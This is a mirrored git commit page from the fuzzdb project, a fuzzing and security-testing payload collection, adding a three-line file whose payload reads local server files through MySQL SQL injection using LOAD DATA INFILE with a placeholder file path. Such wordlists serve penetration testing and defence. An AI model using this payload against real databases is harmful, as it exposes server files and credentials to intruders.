mirror of
https://github.com/fuzzdb-project/fuzzdb.git
synced 2024-11-22 19:13:09 +00:00
sqli attacks
This commit is contained in:
parent
cb71ac1f2a
commit
fe9b041b0d
1 changed files with 3 additions and 0 deletions
|
@ -0,0 +1,3 @@
|
|||
# mysql local file disclosure through sqli
|
||||
# fuzz interesting absolute filepath/filename into <filepath>
|
||||
create table myfile (input TEXT); load data infile '<filepath>' into table myfile; select * from myfile;
|
Loading…
Reference in a new issue